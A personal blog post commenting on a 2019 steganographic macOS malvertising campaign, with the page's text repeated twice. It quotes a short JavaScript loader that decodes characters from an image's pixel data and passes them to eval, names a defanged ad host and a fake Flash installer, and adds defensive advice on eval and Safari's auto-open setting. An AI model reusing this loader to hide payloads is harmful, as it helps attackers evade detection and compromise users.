Put the knife down and take a green herb, dude. (c) Ruffin Bailey 2001-2021

I’d been meaning to talk about the stenographic macOS exploit for a while. It’s interesting, but doesn’t really seem to warrant the amount of press it got. The TL;DR for it seems to be, “This is a clever hack to recreate the sorts of exploit you saw all over the place five years ago pop back up briefly.”

That is, all it does is hide some code that can would’ve been fingerprinted as an attack. You still have to download something stupid (afaict) to be compromised.

Let’s hit the high points from the security blog post:

Here’s how the exploit operates:

Create a Canvas object (this enables the use of the HTML5 Canvas API in order to interact with images and their underlying data.)

Grab the image located at: hxxp://s.ad-pixel.com/sscc.jpg

Define a function that checks if a specific font family is supported in the browser.

Check if Apple fonts are supported. If not, then do nothing.

If so, then loop through the underlying data in the image file. Each loop reads a pixel value and translates it into an alphanumeric character.

Add the newly extracted character to a string.

Execute the code in the string.

...

All of the landing pages have been observed to force the download of a file named AdobeFlashPlayerInstaller.iso

And here’s the secret code in action that reads from the image and pushes it into an eval:

image['onload'] = function () {
    ctx['drawImage'](image, 0x0, 0x0);
    var o = ctx['getImageData'](0x0, 0x0, image['width'], image['height']);
    for (var p = 0x0, q = 0x0; q < 0x4b; p = p + 0x4, q++) {
        rs += String['fromCharCode'](o['data'][p + 0x2]);
    }
    eval(rs);
};

That should do it for you. It treats the image as a data stream, decodes some characters, and evals them. Well, duh.

Question: Why do browsers still allow eval?

(Okay, there’s probably something where on-demand loading with require, once transpiled (and don’t get me started on transpiled code (which I use all the time professionally, true) or I’ll get out my old man stick and scare you off of my lawn), calls eval, but it seems we could distinguish between libraries loaded and eval’d and strings created on the client so that we could at least get rid of this low-hanging fruit.)

As the blog author says…

Techniques like steganography are useful for smuggling payloads without relying on hex encoded strings or bulky lookup tables.

That’s really all we’re doing… we’re using an image for encoding a payload, and security folks hadn’t thought to sniff those yet. The rest still has to trick you into opening something you didn’t ask for before you’re compromised. That is, there are other checks to prevent immediate failure.

Btw: This is why you have to turn off “Open ‘safe’ files after downloading” in Safari. You can be made to download files, and you don’t want to hand them automatically to another security issue.

This is a natural progression. Not really much to see or learn here past that.

Labels: apple, browsers, security, web

title: Put the knife down and take a green herb, dude.	descrip: One feller's views on the state of everyday computer science & its application (and now, OTHER STUFF) who isn't rich enough to shell out for www.myfreakinfirst-andlast-name.com Using 89% of the same design the blog had in 2001.
FOR ENTERTAINMENT PURPOSES ONLY!!! Back-up your data and, when you bike, always wear white. As an Amazon Associate, I earn from qualifying purchases. Affiliate links in green.
x MarkUpDown is the best Markdown editor for professionals on Windows 10. It includes two-pane live preview, in-app uploads to imgur for image hosting, and MultiMarkdown table support. Features you won't find anywhere else include... MarkUpDown Multiline Table & Bootstrap Grid support. Beautiful Easy Actions that keep the Markdown flowing. HTML paste to paste HTML source into your documents. You've wasted more than $15 of your time looking for a great Markdown editor. Stop looking. MarkUpDown is the app you're looking for. Learn more or head over to the 'Store now!

Monday, March 04, 2019
Security & Stenography: Nothing to see here I’d been meaning to talk about the stenographic macOS exploit for a while. It’s interesting, but doesn’t really seem to warrant the amount of press it got. The TL;DR for it seems to be, “This is a clever hack to recreate the sorts of exploit you saw all over the place five years ago pop back up briefly.” That is, all it does is hide some code that can would’ve been fingerprinted as an attack. You still have to download something stupid (afaict) to be compromised. Let’s hit the high points from the security blog post: Here’s how the exploit operates: Create a Canvas object (this enables the use of the HTML5 Canvas API in order to interact with images and their underlying data.) Grab the image located at: hxxp://s.ad-pixel.com/sscc.jpg Define a function that checks if a specific font family is supported in the browser. Check if Apple fonts are supported. If not, then do nothing. If so, then loop through the underlying data in the image file. Each loop reads a pixel value and translates it into an alphanumeric character. Add the newly extracted character to a string. Execute the code in the string. ... All of the landing pages have been observed to force the download of a file named AdobeFlashPlayerInstaller.iso And here’s the secret code in action that reads from the image and pushes it into an eval: `image['onload'] = function () { ctx['drawImage'](image, 0x0, 0x0); var o = ctx['getImageData'](0x0, 0x0, image['width'], image['height']); for (var p = 0x0, q = 0x0; q < 0x4b; p = p + 0x4, q++) { rs += String['fromCharCode'](o['data'][p + 0x2]); } eval(rs); };` That should do it for you. It treats the image as a data stream, decodes some characters, and `eval`s them. Well, duh. Question: Why do browsers still allow `eval`? (Okay, there’s probably something where on-demand loading with `require`, once transpiled (and don’t get me started on transpiled code (which I use all the time professionally, true) or I’ll get out my old man stick and scare you off of my lawn), calls `eval`, but it seems we could distinguish between libraries loaded and eval’d and strings created on the client so that we could at least get rid of this low-hanging fruit.) As the blog author says… Techniques like steganography are useful for smuggling payloads without relying on hex encoded strings or bulky lookup tables. That’s really all we’re doing… we’re using an image for encoding a payload, and security folks hadn’t thought to sniff those yet. The rest still has to trick you into opening something you didn’t ask for before you’re compromised. That is, there are other checks to prevent immediate failure. Btw: This is why you have to turn off “Open ‘safe’ files after downloading” in Safari. You can be made to download files, and you don’t want to hand them automatically to another security issue. This is a natural progression. Not really much to see or learn here past that. Labels: apple, browsers, security, web posted by ruffin at 3/04/2019 08:32:00 AM

<< Older \| Newer >>